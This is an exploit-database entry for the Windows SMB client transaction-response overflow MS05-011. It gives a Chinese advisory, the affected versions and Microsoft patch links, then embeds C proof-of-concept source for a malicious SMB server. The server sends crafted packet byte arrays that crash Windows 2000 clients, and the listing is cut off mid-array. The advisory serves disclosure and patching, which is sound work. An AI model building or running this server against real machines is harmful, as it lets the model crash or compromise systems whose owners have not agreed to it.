MS Windows (SMB) Transaction Response Handling Exploit (MS05-011)

2005-06-23T00:00:00

Description

漏洞描述：Windows SMB客户端在处理SMB响应时存在一个缓冲区溢出漏洞。恶意的SMB服务器可以利用这个漏洞在连接该服务器的SMB客户端主机上执行任意命令。MRXSMB.SYS驱动负责执行SMB客户端操作以及处理SMB服务器返回的响应。一些重要的Windows文件共享操作以及所有的RPC-over-named-pipes操作使用SMB命令Trans(25h)和Trans2(32h)。一个恶意的SMB服务器通过发送特殊的Transaction响应数据可能导致一个缓冲区溢出漏洞。溢出可能发生在任何这个数据被处理的地方，例如MRXSMB.SYS或其他客户端代码中。例如，如果Trans2 FIND_FIRST2响应报文中的文件名和短文件名长度字段被设置为一个过大的值，就可能导致一个缓冲区溢出。攻击者也可以通过设置一个恶意的file://链接，当远程用户点击这个链接时，导致代码被执行。漏洞影响：受影响的软件： •Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4 •Microsoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2 •Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) •Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) •Microsoft Windows Server 2003•Microsoft Windows Server 2003（用于基于 Itanium 的系统不受影响的软件： •Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME)CVE-ID：CVE-2005-0045  CNNVD-ID：CNNVD-200505-518 CNVD-ID：CNVD-2005-0403 微软编号：MS05-011/KB885250<a href="https://technet.microsoft.com/library/security/MS05-011" rel="nofollow">https://technet.microsoft.com/library/security/MS05-011</a>解决方案：Microsoft --------- Microsoft已经为此发布了一个安全公告（MS05-011）以及相应补丁:MS05-011：Vulnerability in Server Message Block Could Allow Remote Code Execution (885250)链接：<a href="http://www.microsoft.com/technet/security/bulletin/MS05-011.mspx">http://www.microsoft.com/technet/security/bulletin/MS05-011.mspx</a>补丁下载：* Microsoft Windows 2000 Service Pack 3和Microsoft Windows 2000 Service Pack 4 <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=656BDDA5-672B-4A6B-B192-24A2171C7355">http://www.microsoft.com/downloads/details.aspx?FamilyId=656BDDA5-672B-4A6B-B192-24A2171C7355</a> * Microsoft Windows XP Service Pack 1和Microsoft Windows XP Service Pack 2 <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=6DF9B2D9-B86E-4924-B677-978EC6B81B54">http://www.microsoft.com/downloads/details.aspx?FamilyId=6DF9B2D9-B86E-4924-B677-978EC6B81B54</a> * Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=E5043926-0B79-489B-8EA1-85512828C6F4">http://www.microsoft.com/downloads/details.aspx?FamilyId=E5043926-0B79-489B-8EA1-85512828C6F4</a> * Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=8DA45DD0-882E-417C-A7F2-4AABAD675129">http://www.microsoft.com/downloads/details.aspx?FamilyId=8DA45DD0-882E-417C-A7F2-4AABAD675129</a> * Microsoft Windows Server 2003 <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=1B703115-54C0-445C-B5CE-E9A53C45B36A">http://www.microsoft.com/downloads/details.aspx?FamilyId=1B703115-54C0-445C-B5CE-E9A53C45B36A</a> * Microsoft Windows Server 2003 for Itanium-based Systems <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=8DA45DD0-882E-417C-A7F2-4AABAD675129">http://www.microsoft.com/downloads/details.aspx?FamilyId=8DA45DD0-882E-417C-A7F2-4AABAD675129</a>

{"href": "https://www.seebug.org/vuldb/ssvid-15611", "status": "cve,poc,details", "bulletinFamily": "exploit", "modified": "2005-06-23T00:00:00", "title": "MS Windows (SMB) Transaction Response Handling Exploit (MS05-011)", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-15611", "cvelist": ["CVE-2005-0045"], "description": "\u6f0f\u6d1e\u63cf\u8ff0\uff1aWindows SMB\u5ba2\u6237\u7aef\u5728\u5904\u7406SMB\u54cd\u5e94\u65f6\u5b58\u5728\u4e00\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u3002\u6076\u610f\u7684SMB\u670d\u52a1\u5668\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u5728\u8fde\u63a5\u8be5\u670d\u52a1\u5668\u7684SMB\u5ba2\u6237\u7aef\u4e3b\u673a\u4e0a\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002MRXSMB.SYS\u9a71\u52a8\u8d1f\u8d23\u6267\u884cSMB\u5ba2\u6237\u7aef\u64cd\u4f5c\u4ee5\u53ca\u5904\u7406SMB\u670d\u52a1\u5668\u8fd4\u56de\u7684\u54cd\u5e94\u3002\u4e00\u4e9b\u91cd\u8981\u7684Windows\u6587\u4ef6\u5171\u4eab\u64cd\u4f5c\u4ee5\u53ca\u6240\u6709\u7684RPC-over-named-pipes\u64cd\u4f5c\u4f7f\u7528SMB\u547d\u4ee4Trans(25h)\u548cTrans2(32h)\u3002\u4e00\u4e2a\u6076\u610f\u7684SMB\u670d\u52a1\u5668\u901a\u8fc7\u53d1\u9001\u7279\u6b8a\u7684Transaction\u54cd\u5e94\u6570\u636e\u53ef\u80fd\u5bfc\u81f4\u4e00\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u3002\u6ea2\u51fa\u53ef\u80fd\u53d1\u751f\u5728\u4efb\u4f55\u8fd9\u4e2a\u6570\u636e\u88ab\u5904\u7406\u7684\u5730\u65b9\uff0c\u4f8b\u5982MRXSMB.SYS\u6216\u5176\u4ed6\u5ba2\u6237\u7aef\u4ee3\u7801\u4e2d\u3002\u4f8b\u5982\uff0c\u5982\u679cTrans2 FIND_FIRST2\u54cd\u5e94\u62a5\u6587\u4e2d\u7684\u6587\u4ef6\u540d\u548c\u77ed\u6587\u4ef6\u540d\u957f\u5ea6\u5b57\u6bb5\u88ab\u8bbe\u7f6e\u4e3a\u4e00\u4e2a\u8fc7\u5927\u7684\u503c\uff0c\u5c31\u53ef\u80fd\u5bfc\u81f4\u4e00\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\u653b\u51fb\u8005\u4e5f\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6e\u4e00\u4e2a\u6076\u610f\u7684file://\u94fe\u63a5\uff0c\u5f53\u8fdc\u7a0b\u7528\u6237\u70b9\u51fb\u8fd9\u4e2a\u94fe\u63a5\u65f6\uff0c\u5bfc\u81f4\u4ee3\u7801\u88ab\u6267\u884c\u3002\u6f0f\u6d1e\u5f71\u54cd\uff1a\u53d7\u5f71\u54cd\u7684\u8f6f\u4ef6\uff1a \u2022Microsoft Windows 2000 Service Pack 3 \u548c Microsoft Windows 2000 Service Pack 4 \u2022Microsoft Windows XP Service Pack 1 \u548c Microsoft Windows XP Service Pack 2 \u2022Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) \u2022Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) \u2022Microsoft Windows Server 2003\u2022Microsoft Windows Server 2003\uff08\u7528\u4e8e\u57fa\u4e8e Itanium \u7684\u7cfb\u7edf\u4e0d\u53d7\u5f71\u54cd\u7684\u8f6f\u4ef6\uff1a \u2022Microsoft Windows 98\u3001Microsoft Windows 98 Second Edition (SE) \u548c Microsoft Windows Millennium Edition (ME)CVE-ID\uff1aCVE-2005-0045  CNNVD-ID\uff1aCNNVD-200505-518 CNVD-ID\uff1aCNVD-2005-0403 \u5fae\u8f6f\u7f16\u53f7\uff1aMS05-011/KB885250<a href=\"https://technet.microsoft.com/library/security/MS05-011\" rel=\"nofollow\">https://technet.microsoft.com/library/security/MS05-011</a>\u89e3\u51b3\u65b9\u6848\uff1aMicrosoft --------- Microsoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS05-011\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:MS05-011\uff1aVulnerability in Server Message Block Could Allow Remote Code Execution (885250)\u94fe\u63a5\uff1a<a href=\"http://www.microsoft.com/technet/security/bulletin/MS05-011.mspx\">http://www.microsoft.com/technet/security/bulletin/MS05-011.mspx</a>\u8865\u4e01\u4e0b\u8f7d\uff1a* Microsoft Windows 2000 Service Pack 3\u548cMicrosoft Windows 2000 Service Pack 4 <a href=\"http://www.microsoft.com/downloads/details.aspx?FamilyId=656BDDA5-672B-4A6B-B192-24A2171C7355\">http://www.microsoft.com/downloads/details.aspx?FamilyId=656BDDA5-672B-4A6B-B192-24A2171C7355</a> * Microsoft Windows XP Service Pack 1\u548cMicrosoft Windows XP Service Pack 2 <a href=\"http://www.microsoft.com/downloads/details.aspx?FamilyId=6DF9B2D9-B86E-4924-B677-978EC6B81B54\">http://www.microsoft.com/downloads/details.aspx?FamilyId=6DF9B2D9-B86E-4924-B677-978EC6B81B54</a> * Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) <a href=\"http://www.microsoft.com/downloads/details.aspx?FamilyId=E5043926-0B79-489B-8EA1-85512828C6F4\">http://www.microsoft.com/downloads/details.aspx?FamilyId=E5043926-0B79-489B-8EA1-85512828C6F4</a> * Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) <a href=\"http://www.microsoft.com/downloads/details.aspx?FamilyId=8DA45DD0-882E-417C-A7F2-4AABAD675129\">http://www.microsoft.com/downloads/details.aspx?FamilyId=8DA45DD0-882E-417C-A7F2-4AABAD675129</a> * Microsoft Windows Server 2003 <a href=\"http://www.microsoft.com/downloads/details.aspx?FamilyId=1B703115-54C0-445C-B5CE-E9A53C45B36A\">http://www.microsoft.com/downloads/details.aspx?FamilyId=1B703115-54C0-445C-B5CE-E9A53C45B36A</a> * Microsoft Windows Server 2003 for Itanium-based Systems <a href=\"http://www.microsoft.com/downloads/details.aspx?FamilyId=8DA45DD0-882E-417C-A7F2-4AABAD675129\">http://www.microsoft.com/downloads/details.aspx?FamilyId=8DA45DD0-882E-417C-A7F2-4AABAD675129</a>", "viewCount": 12, "published": "2005-06-23T00:00:00", "sourceData": "\n /*\r\n * Windows SMB Client Transaction Response Handling\r\n *\r\n * MS05-011\r\n * CAN-2005-0045\r\n *\r\n * This works against >> Win2k <<\r\n *\r\n * cybertronic[at]gmx[dot]net\r\n * http://www.livejournal.com/users/cybertronic/\r\n *\r\n * usage:\r\n * gcc -o mssmb_poc mssmb_poc.c\r\n * ./mssmb_poc\r\n *\r\n * connect via \\\\ip\r\n * and hit the netbios folder!\r\n *\r\n * ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690,\r\n * 0x00000000)\r\n * PAGE_FAULT_IN_NONPAGED_AREA\r\n *\r\n * The Client reboots immediately\r\n *\r\n * Technical Details:\r\n * -----------------\r\n *\r\n * The driver MRXSMB.SYS is responsible for performing SMB\r\n * client operations and processing the responses returned\r\n * by an SMB server service. A number of important Windows\r\n * File Sharing operations, and all RPC-over-named-pipes,\r\n * use the SMB commands Trans (25h) and Trans2 (32h). A\r\n * malicious SMB server can respond with specially crafted\r\n * Transaction response data that will cause an overflow\r\n * wherever the data is handled, either in MRXSMB.SYS or\r\n * in client code to which it provides data. One example\r\n * would be if the\r\n *\r\n * file name length field\r\n *\r\n * and the\r\n *\r\n * short file name length field\r\n *\r\n * in a Trans2 FIND_FIRST2 response packet can be supplied\r\n * with inappropriately large values in order to cause an\r\n * excessive memcpy to occur when the data is handled.\r\n * In the case of these examples an attacker could leverage\r\n * file:// links, that when clicked by a remote user, would\r\n * lead to code execution.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n\r\n#define PORT\t445\r\n\r\nunsigned char SmbNeg[] =\r\n"\\x00\\x00\\x00\\x55"\r\n"\\xff\\x53\\x4d\\x42" // SMB\r\n"\\x72" // SMB Command: Negotiate Protocol (0x72)\r\n"\\x00\\x00\\x00\\x00" // NT Status: STATUS_SUCCESS (0x00000000)\r\n"\\x98" // Flags: 0x98\r\n"\\x53\\xc8" // Flags2 : 0xc853\r\n"\\x00\\x00" // Process ID High: 0\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Signature: 0000000000000000\r\n"\\x00\\x00" // Reserved: 0000\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\xff\\xfe" // Process ID: 65279\r\n"\\x00\\x00" // User ID: 0\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x11" // Word Count (WCT): 17\r\n"\\x05\\x00" // Dialect Index: 5, greater than LANMAN2.1\r\n"\\x03" // Security Mode: 0x03\r\n"\\x0a\\x00" // Max Mpx Count: 10\r\n"\\x01\\x00" // Max VCs: 1\r\n"\\x04\\x11\\x00\\x00" // Max Buffer Size: 4356\r\n"\\x00\\x00\\x01\\x00" // Max Raw Buffer 65536\r\n"\\x00\\x00\\x00\\x00" // Session Key: 0x00000000\r\n"\\xfd\\xe3\\x00\\x80" // Capabilities: 0x8000e3fd\r\n"\\x52\\xa2\\x4e\\x73\\xcb\\x75\\xc5\\x01" // System Time: Jun 20, 2005 12:08:32.327125000\r\n"\\x88\\xff" // Server Time Zone: /120 min from UTC\r\n"\\x00" // Key Length: 0\r\n"\\x10\\x00" // Byte Count (BCC): 16\r\n"\\x9e\\x12\\xd7\\x77\\xd4\\x59\\x6c\\x40" // Server GUID: 9E12D777D4596C40\r\n"\\xbc\\xc0\\xb4\\x22\\x40\\x50\\x01\\xd4";// BCC0B422405001D4\r\n\r\nunsigned char SessionSetupAndXNeg[] = // Negotiate ERROR Response\r\n"\\x00\\x00\\x01\\x1b"\r\n"\\xff\\x53\\x4d\\x42\\x73\\x16\\x00\\x00\\xc0\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x04\\xff\\x00\\x1b\\x01\\x00\\x00\\xa6\\x00\\xf0\\x00\\x4e\\x54\\x4c\\x4d\\x53"\r\n"\\x53\\x50\\x00\\x02\\x00\\x00\\x00\\x12\\x00\\x12\\x00\\x30\\x00\\x00\\x00\\x15"\r\n"\\x82\\x8a\\xe0"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // NTLM Challenge\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x00\\x64\\x00\\x42\\x00\\x00\\x00"\r\n"\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00"\r\n"\\x43\\x00\\x02\\x00\\x12\\x00\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\\x49\\x00"\r\n"\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x01\\x00\\x12\\x00\\x53\\x00\\x45\\x00"\r\n"\\x52\\x00\\x56\\x00\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x04\\x00"\r\n"\\x12\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x76\\x00\\x69\\x00\\x63\\x00\\x65\\x00"\r\n"\\x70\\x00\\x63\\x00\\x03\\x00\\x12\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x76\\x00"\r\n"\\x69\\x00\\x63\\x00\\x65\\x00\\x70\\x00\\x63\\x00\\x06\\x00\\x04\\x00\\x01\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f"\r\n"\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x31\\x00\\x00\\x00\\x57"\r\n"\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32"\r\n"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x4c\\x00\\x41\\x00\\x4e\\x00\\x20"\r\n"\\x00\\x4d\\x00\\x61\\x00\\x6e\\x00\\x61\\x00\\x67\\x00\\x65\\x00\\x72\\x00\\x00";\r\n\r\nunsigned char SessionSetupAndXAuth[] =\r\n"\\x00\\x00\\x00\\x75"\r\n"\\xff\\x53\\x4d\\x42\\x73\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x04\\xff\\x00\\x75\\x00\\x01\\x00\\x00\\x00\\x4a\\x00\\x4e\\x57\\x00\\x69\\x00"\r\n"\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x35\\x00\\x2e\\x00"\r\n"\\x31\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00"\r\n"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x4c\\x00"\r\n"\\x41\\x00\\x4e\\x00\\x20\\x00\\x4d\\x00\\x61\\x00\\x6e\\x00\\x61\\x00\\x67\\x00"\r\n"\\x65\\x00\\x72\\x00\\x00";\r\n\r\nunsigned char TreeConnectAndX[] =\r\n"\\x00\\x00\\x00\\x38"\r\n"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x07\\xff\\x00\\x38\\x00\\x01\\x00\\xff\\x01\\x00\\x00\\xff\\x01\\x00\\x00\\x07"\r\n"\\x00\\x49\\x50\\x43\\x00\\x00\\x00\\x00";\r\n\r\nunsigned char SmbNtCreate [] =\r\n"\\x00\\x00\\x00\\x87"\r\n"\\xff\\x53\\x4d\\x42" // SMB\r\n"\\xa2" // SMB Command: NT Create AndX (0xa2)\r\n"\\x00\\x00\\x00\\x00" // NT Status: STATUS_SUCCESS (0x00000000)\r\n"\\x98" // Flags: 0x98\r\n"\\x07\\xc8" // Flags2 : 0xc807\r\n"\\x00\\x00" // Process ID High: 0\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Signature: 0000000000000000\r\n"\\x00\\x00" // Reserved: 0000\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // User ID: 0\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x2a" // Word Count (WCT): 42\r\n"\\xff" // AndXCommand: No further commands (0xff)\r\n"\\x00" // Reserved: 00\r\n"\\x87\\x00" // AndXOffset: 135\r\n"\\x00" // Oplock level: No oplock granted (0)\r\n"\\x00\\x00" // FID: 0\r\n"\\x01\\x00\\x00\\x00" // Create action: The file existed and was opened (1)\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Created: No time specified (0)\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Last Access: No time specified (0)\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Last Write: No time specified (0)\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Change: No time specified (0)\r\n"\\x80\\x00\\x00\\x00" // File Attributes: 0x00000080\r\n"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00" // Allocation Size: 4096\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // End Of File: 0\r\n"\\x02\\x00" // File Type: Named pipe in message mode (2)\r\n"\\xff\\x05" // IPC State: 0x05ff\r\n"\\x00" // Is Directory: This is NOT a directory (0)\r\n"\\x00\\x00" // Byte Count (BCC): 0\r\n\r\n// crap\r\n"\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00"\r\n"\\x00\\x74\\x7a\\x4f\\xac\\x2d\\xdf\\xd9"\r\n"\\x11\\xb9\\x20\\x00\\x10\\xdc\\x9b\\x01"\r\n"\\x12\\x00\\x9b\\x01\\x12\\x00\\x1b\\xc2";\r\n\r\nunsigned char DceRpc[] =\r\n"\\x00\\x00\\x00\\x7c"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x44\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x44\\x00\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x45\\x00\\x00\\x05\\x00\\x0c\\x03\\x10\\x00\\x00\\x00"\r\n"\\x44\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb8\\x10\\xb8\\x10"\r\n"\\x00\\x00\\x00\\x00" // Assoc Group\r\n"\\x0d\\x00\\x5c\\x50\\x49\\x50\\x45\\x5c"\r\n"\\x00\\x00\\x00" // srv or wks\r\n"\\x73\\x76\\x63\\x00\\xff\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x5d\\x88"\r\n"\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\\x2b\\x10\\x48\\x60\\x02\\x00\\x00"\r\n"\\x00";\r\n\r\nunsigned char WksSvc[] =\r\n"\\x00\\x00\\x00\\xb0"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x78\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x78\\x00\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x79\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00"\r\n"\\x78\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x60\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x64\\x00\\x00\\x00\\xb8\\x0f\\x16\\x00\\xf4\\x01\\x00\\x00\\xe6\\x0f\\x16\\x00"\r\n"\\xd2\\x0f\\x16\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0a\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00"\r\n"\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x00\\x00\\x0a\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x57\\x00\\x4f\\x00\\x52\\x00\\x4b\\x00"\r\n"\\x47\\x00\\x52\\x00\\x4f\\x00\\x55\\x00\\x50\\x00\\x00\\x00\\x00\\x00\\x00\\x00";\r\n\r\nunsigned char SrvSvc[] =\r\n"\\x00\\x00\\x00\\xac"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x74\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x74\\x00\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x75\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00"\r\n"\\x74\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x65\\x00\\x00\\x00\\x68\\x3d\\x14\\x00\\xf4\\x01\\x00\\x00"\r\n"\\x80\\x3d\\x14\\x00" // Server IP\r\n"\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\x10\\x05\\x00\\x9c\\x3d\\x14\\x00"\r\n"\\x0e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\\x00\\x00"\r\n"\\x31\\x00\\x39\\x00\\x32\\x00\\x2e\\x00\\x31\\x00\\x36\\x00\\x38\\x00\\x2e\\x00" // Server IP ( UNICODE )\r\n"\\x32\\x00\\x2e\\x00\\x31\\x00\\x30\\x00\\x33\\x00\\x00\\x00"\r\n"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x55\\x00"\r\n"\\x00\\x00\\x00\\x00";\r\n\r\nunsigned char SmbClose[] =\r\n"\\x00\\x00\\x00\\x23"\r\n"\\xff\\x53\\x4d\\x42" // SMB\r\n"\\x04" // SMB Command: Close (0x04)\r\n"\\x00\\x00\\x00\\x00" // NT Status: STATUS_SUCCESS (0x00000000)\r\n"\\x98" // Flags: 0x98\r\n"\\x07\\xc8" // Flags2 : 0xc807\r\n"\\x00\\x00" // Process ID High: 0\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Signature: 0000000000000000\r\n"\\x00\\x00" // Reserved: 0000\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x00" // Word Count (WCT): 0\r\n"\\x00\\x00"; // Byte Count (BCC): 0\r\n\r\nunsigned char NetrShareEnum[] =\r\n"\\x00\\x00\\x01\\x90"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x58\\x01\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x58\\x01\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x59\\x01\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00"\r\n"\\x58\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x01\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x0a\\x17\\x00\\x04\\x00\\x00\\x00"\r\n"\\xa0\\x28\\x16\\x00\\x04\\x00\\x00\\x00\\x80\\x48\\x16\\x00\\x03\\x00\\x00\\x80"\r\n"\\x8a\\x48\\x16\\x00\\x6e\\x48\\x16\\x00\\x00\\x00\\x00\\x00\\x7e\\x48\\x16\\x00"\r\n"\\x48\\x48\\x16\\x00\\x00\\x00\\x00\\x80\\x56\\x48\\x16\\x00\\x20\\x48\\x16\\x00"\r\n"\\x00\\x00\\x00\\x80\\x26\\x48\\x16\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x05\\x00\\x00\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\\x36\\x00"\r\n"\\x0b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x52\\x00\\x65\\x00"\r\n"\\x6d\\x00\\x6f\\x00\\x74\\x00\\x65\\x00\\x2d\\x00\\x49\\x00\\x50\\x00\\x43\\x00"\r\n"\\x00\\x00\\x37\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00"\r\n"\\x6e\\x00\\x65\\x00\\x74\\x00\\x62\\x00\\x69\\x00\\x6f\\x00\\x73\\x00\\x00\\x00"\r\n"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x41\\x00\\x44\\x00"\r\n"\\x4d\\x00\\x49\\x00\\x4e\\x00\\x24\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x52\\x00\\x65\\x00\\x6d\\x00\\x6f\\x00"\r\n"\\x74\\x00\\x65\\x00\\x61\\x00\\x64\\x00\\x6d\\x00\\x69\\x00\\x6e\\x00\\x00\\x00"\r\n"\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0